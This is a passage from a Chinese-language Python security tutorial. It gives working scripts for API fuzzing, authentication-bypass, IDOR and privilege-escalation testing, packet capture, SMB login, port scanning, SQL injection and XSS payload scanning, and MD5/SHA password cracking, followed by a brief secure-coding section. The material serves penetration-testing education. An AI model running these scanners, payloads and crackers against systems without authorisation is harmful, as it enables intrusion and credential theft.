        vulnerabilities = []
        payloads = self.generate_payloads()
        
        for payload in payloads:
            try:
                if method == 'GET':
                    response = self.client.get(
                        f"{self.base_url}{endpoint}",
                        params={'input': payload},
                        timeout=5
                    )
                else:
                    response = self.client.post(
                        f"{self.base_url}{endpoint}",
                        json={'input': payload},
                        timeout=5
                    )
                
                # 检查异常响应
                if response.status_code == 500:
                    print(f"[!] 500错误 - Payload: {payload[:50]}")
                    vulnerabilities.append({
                        'payload': payload,
                        'status': 500,
                        'type': 'Server Error'
                    })
                
                # 检查SQL错误
                sql_errors = ['sql', 'mysql', 'sqlite', 'postgresql', 'oracle']
                if any(err in response.text.lower() for err in sql_errors):
                    print(f"[!] SQL错误 - Payload: {payload[:50]}")
                    vulnerabilities.append({
                        'payload': payload,
                        'type': 'SQL Injection'
                    })
                
                # 检查反射
                if payload in response.text:
                    print(f"[!] Payload反射 - {payload[:50]}")
                    vulnerabilities.append({
                        'payload': payload,
                        'type': 'Reflected Input'
                    })
            
            except Exception as e:
                print(f"[-] 错误: {e}")
        
        return vulnerabilities
    
    def test_rate_limiting(self, endpoint, requests_count=100):
        """测试速率限制"""
        print(f"[*] 测试速率限制: {endpoint}")
        
        responses = []
        for i in range(requests_count):
            response = self.client.get(f"{self.base_url}{endpoint}")
            responses.append(response.status_code)
            
            if response.status_code == 429:
                print(f"[+] 速率限制生效 (第{i+1}次请求)")
                return True
        
        print("[-] 未检测到速率限制")
        return False
    
    def test_authentication_bypass(self, endpoint):
        """测试认证绕过"""
        print(f"[*] 测试认证绕过: {endpoint}")
        
        bypass_attempts = [
            {},  # 无认证头
            {'Authorization': ''},  # 空token
            {'Authorization': 'Bearer '},  # 空Bearer
            {'Authorization': 'Bearer invalid'},  # 无效token
            {'Authorization': 'Bearer null'},
            {'Authorization': 'Bearer undefined'},
        ]
        
        for headers in bypass_attempts:
            response = self.client.get(
                f"{self.base_url}{endpoint}",
                headers=headers
            )
            
            if response.status_code == 200:
                print(f"[!] 可能的认证绕过: {headers}")
                return True
        
        return False

# 使用示例
fuzzer = APIFuzzer('https://api.example.com')
fuzzer.fuzz_endpoint('/search', method='GET')
fuzzer.test_rate_limiting('/api/data')
fuzzer.test_authentication_bypass('/admin/users')
```

#### 6.5.3 API权限测试
```python
class APIAuthorizationTester:
    """API权限测试器"""
    
    def __init__(self, base_url):
        self.base_url = base_url
    
    def test_idor(self, endpoint_template, user_tokens, resource_ids):
        """测试不安全的直接对象引用(IDOR)"""
        print("[*] 测试IDOR漏洞")
        
        vulnerabilities = []
        
        for user_name, token in user_tokens.items():
            headers = {'Authorization': f'Bearer {token}'}
            
            for resource_id in resource_ids:
                endpoint = endpoint_template.format(id=resource_id)
                response = httpx.get(
                    f"{self.base_url}{endpoint}",
                    headers=headers
                )
                
                if response.status_code == 200:
                    print(f"[!] {user_name} 可以访问资源 {resource_id}")
                    vulnerabilities.append({
                        'user': user_name,
                        'resource': resource_id,
                        'endpoint': endpoint
                    })
        
        return vulnerabilities
    
    def test_privilege_escalation(self, user_token, admin_endpoints):
        """测试权限提升"""
        print("[*] 测试权限提升")
        
        headers = {'Authorization': f'Bearer {user_token}'}
        
        for endpoint in admin_endpoints:
            response = httpx.get(
                f"{self.base_url}{endpoint}",
                headers=headers
            )
            
            if response.status_code == 200:
                print(f"[!] 普通用户可以访问管理员端点: {endpoint}")
                return True
        
        return False

# 使用示例
tester = APIAuthorizationTester('https://api.example.com')

# 测试IDOR
user_tokens = {
    'user1': 'token1',
    'user2': 'token2'
}
resource_ids = [1, 2, 3, 4, 5]
tester.test_idor('/users/{id}', user_tokens, resource_ids)

# 测试权限提升
admin_endpoints = ['/admin/users', '/admin/settings', '/admin/logs']
tester.test_privilege_escalation('normal_user_token', admin_endpoints)
```

---

### 6.6 Postman集合导出与自动化

#### 导出Postman集合为Python
```python
import json
import httpx

def run_postman_collection(collection_file):
    """运行Postman集合"""
    with open(collection_file, 'r') as f:
        collection = json.load(f)
    
    print(f"[*] 运行集合: {collection['info']['name']}")
    
    for item in collection['item']:
        request = item['request']
        
        method = request['method']
        url = request['url']['raw']
        headers = {h['key']: h['value'] for h in request.get('header', [])}
        
        print(f"[*] {method} {url}")
        
        if method == 'GET':
            response = httpx.get(url, headers=headers)
        elif method == 'POST':
            body = request.get('body', {})
            if body.get('mode') == 'raw':
                data = json.loads(body['raw'])
                response = httpx.post(url, headers=headers, json=data)
        
        print(f"    状态码: {response.status_code}")
        
        # 检查测试
        if 'event' in item:
            for event in item['event']:
                if event['listen'] == 'test':
                    print(f"    测试: {event['script']['exec']}")

# 使用示例
run_postman_collection('api_collection.json')
```

---

## 7. 网络流量分析

### 7.1 pyshark - Wireshark的Python封装

**功能**: 使用Wireshark的tshark进行数据包分析

**安装**: `pip install pyshark`

```python
import pyshark

# 实时捕获
def live_capture(interface='eth0', count=10):
    """实时捕获数据包"""
    capture = pyshark.LiveCapture(interface=interface)
    
    for packet in capture.sniff_continuously(packet_count=count):
        try:
            print(f"协议: {packet.highest_layer}")
            if hasattr(packet, 'ip'):
                print(f"源IP: {packet.ip.src}")
                print(f"目标IP: {packet.ip.dst}")
        except:
            pass

# 读取pcap文件
def read_pcap(filename):
    """读取pcap文件"""
    capture = pyshark.FileCapture(filename)
    for packet in capture:
        print(packet)

# 过滤数据包
def filter_packets(filename, display_filter):
    """使用显示过滤器"""
    capture = pyshark.FileCapture(filename, display_filter=display_filter)
    for packet in capture:
        print(packet)

# 使用示例
filter_packets('traffic.pcap', 'http')
filter_packets('traffic.pcap', 'tcp.port == 80')
```

---

### 7.2 dpkt - 数据包解析

**功能**: 快速解析网络数据包

**安装**: `pip install dpkt`

```python
import dpkt
import socket

def parse_pcap(filename):
    """解析pcap文件"""
    with open(filename, 'rb') as f:
        pcap = dpkt.pcap.Reader(f)
        
        for timestamp, buf in pcap:
            try:
                eth = dpkt.ethernet.Ethernet(buf)
                
                if isinstance(eth.data, dpkt.ip.IP):
                    ip = eth.data
                    src_ip = socket.inet_ntoa(ip.src)
                    dst_ip = socket.inet_ntoa(ip.dst)
                    print(f"{src_ip} -> {dst_ip}")
                    
                    if isinstance(ip.data, dpkt.tcp.TCP):
                        tcp = ip.data
                        print(f"TCP {tcp.sport} -> {tcp.dport}")
            except:
                pass
```

---

## 8. 渗透测试框架

### 8.1 Impacket - 网络协议库

**功能**: 实现各种网络协议，用于渗透测试

**安装**: `pip install impacket`

```python
from impacket import smbconnection

def smb_connect(target, username, password):
    """SMB连接"""
    try:
        conn = smbconnection.SMBConnection(target, target)
        conn.login(username, password)
        print("[+] SMB登录成功")
        
        shares = conn.listShares()
        for share in shares:
            print(f"共享: {share['shi1_netname']}")
        
        return conn
    except Exception as e:
        print(f"[-] 连接失败: {e}")
        return None
```

---

## 9. 实战项目示例

### 9.1 综合端口扫描器

```python
import socket
import threading
from queue import Queue

class PortScanner:
    def __init__(self, target, threads=100):
        self.target = target
        self.threads = threads
        self.queue = Queue()
        self.open_ports = []
    
    def scan_port(self):
        """扫描端口"""
        while not self.queue.empty():
            port = self.queue.get()
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(1)
                result = sock.connect_ex((self.target, port))
                
                if result == 0:
                    print(f"[+] 端口 {port} 开放")
                    self.open_ports.append(port)
                
                sock.close()
            except:
                pass
            finally:
                self.queue.task_done()
    
    def run(self, start_port=1, end_port=65535):
        """运行扫描"""
        print(f"[*] 扫描目标: {self.target}")
        print(f"[*] 端口范围: {start_port}-{end_port}")
        
        for port in range(start_port, end_port + 1):
            self.queue.put(port)
        
        thread_list = []
        for _ in range(self.threads):
            t = threading.Thread(target=self.scan_port)
            t.daemon = True
            t.start()
            thread_list.append(t)
        
        self.queue.join()
        
        print(f"\n[*] 扫描完成，发现 {len(self.open_ports)} 个开放端口")
        return self.open_ports

# 使用示例
scanner = PortScanner('192.168.1.1', threads=200)
open_ports = scanner.run(1, 1000)
```

### 9.2 Web漏洞扫描器

```python
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

class WebVulnScanner:
    def __init__(self, target_url):
        self.target = target_url
        self.session = requests.Session()
    
    def test_sql_injection(self, url):
        """SQL注入测试"""
        payloads = [
            "' OR '1'='1",
            "admin'--",
            "' UNION SELECT NULL--",
            "1' AND '1'='1"
        ]
        
        vulnerabilities = []
        for payload in payloads:
            try:
                params = {'id': payload}
                response = self.session.get(url, params=params, timeout=5)
                
                error_keywords = ['sql', 'mysql', 'syntax', 'database', 'error']
                if any(keyword in response.text.lower() for keyword in error_keywords):
                    vulnerabilities.append({
                        'type': 'SQL Injection',
                        'payload': payload,
                        'url': url
                    })
            except:
                pass
        
        return vulnerabilities
    
    def test_xss(self, url):
        """XSS测试"""
        payloads = [
            "<script>alert('XSS')</script>",
            "<img src=x onerror=alert('XSS')>",
            "javascript:alert('XSS')"
        ]
        
        vulnerabilities = []
        for payload in payloads:
            try:
                params = {'q': payload}
                response = self.session.get(url, params=params, timeout=5)
                
                if payload in response.text:
                    vulnerabilities.append({
                        'type': 'XSS',
                        'payload': payload,
                        'url': url
                    })
            except:
                pass
        
        return vulnerabilities
    
    def scan(self):
        """执行扫描"""
        print(f"[*] 开始扫描: {self.target}")
        
        all_vulns = []
        
        print("[*] 测试SQL注入...")
        sql_vulns = self.test_sql_injection(self.target)
        all_vulns.extend(sql_vulns)
        
        print("[*] 测试XSS...")
        xss_vulns = self.test_xss(self.target)
        all_vulns.extend(xss_vulns)
        
        print(f"\n[*] 扫描完成，发现 {len(all_vulns)} 个漏洞")
        
        for vuln in all_vulns:
            print(f"[!] {vuln['type']}: {vuln['url']}")
            print(f"    Payload: {vuln['payload']}")
        
        return all_vulns

# 使用示例
scanner = WebVulnScanner('http://testphp.vulnweb.com')
vulnerabilities = scanner.scan()
```

### 9.3 密码破解工具

```python
import hashlib
import itertools
import string

class PasswordCracker:
    def __init__(self, hash_value, hash_type='md5'):
        self.hash_value = hash_value.lower()
        self.hash_type = hash_type
    
    def hash_password(self, password):
        """计算密码哈希"""
        if self.hash_type == 'md5':
            return hashlib.md5(password.encode()).hexdigest()
        elif self.hash_type == 'sha1':
            return hashlib.sha1(password.encode()).hexdigest()
        elif self.hash_type == 'sha256':
            return hashlib.sha256(password.encode()).hexdigest()
    
    def dictionary_attack(self, wordlist_file):
        """字典攻击"""
        print(f"[*] 开始字典攻击...")
        
        try:
            with open(wordlist_file, 'r', encoding='utf-8') as f:
                for line in f:
                    password = line.strip()
                    if self.hash_password(password) == self.hash_value:
                        print(f"[+] 密码破解成功: {password}")
                        return password
        except FileNotFoundError:
            print(f"[-] 字典文件不存在: {wordlist_file}")
        
        print("[-] 字典攻击失败")
        return None
    
    def brute_force(self, max_length=4):
        """暴力破解"""
        print(f"[*] 开始暴力破解 (最大长度: {max_length})...")
        
        chars = string.ascii_lowercase + string.digits
        
        for length in range(1, max_length + 1):
            print(f"[*] 尝试长度: {length}")
            
            for attempt in itertools.product(chars, repeat=length):
                password = ''.join(attempt)
                
                if self.hash_password(password) == self.hash_value:
                    print(f"[+] 密码破解成功: {password}")
                    return password
        
        print("[-] 暴力破解失败")
        return None

# 使用示例
# MD5('123456') = e10adc3949ba59abbe56e057f20f883e
cracker = PasswordCracker('e10adc3949ba59abbe56e057f20f883e', 'md5')
password = cracker.brute_force(max_length=6)
```

---

## 9. 安全编程最佳实践

### 9.1 输入验证
```python
import re

def validate_ip(ip):
    """验证IP地址"""
    pattern = r'^(\d{1,3}\.){3}\d{1,3}$'
    if re.match(pattern, ip):
        parts = ip.split('.')
        return all(0 <= int(part) <= 255 for part in parts)
    return False

def sanitize_input(user_input):
    """清理用户输入"""
    dangerous_chars = ['<', '>', '"', "'", '&', ';']
    for char in dangerous_chars:
        user_input = user_input.replace(char, '')
    return user_input
```

### 9.2 安全配置
```python
# 使用环境变量存储敏感信息
import os

API_KEY = os.environ.get('API_KEY')
DATABASE_PASSWORD = os.environ.get('DB_PASSWORD')

# 使用配置文件
import configparser

config = configparser.ConfigParser()
config.read('config.ini')

username = config['database']['username']
password = config['database']['password']
```

### 9.3 日志记录
```python
import logging

logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    filename='security.log'
)

logger = logging.getLogger(__name__)

logger.info("扫描开始")
logger.warning("发现可疑活动")
logger.error("连接失败")
```

---

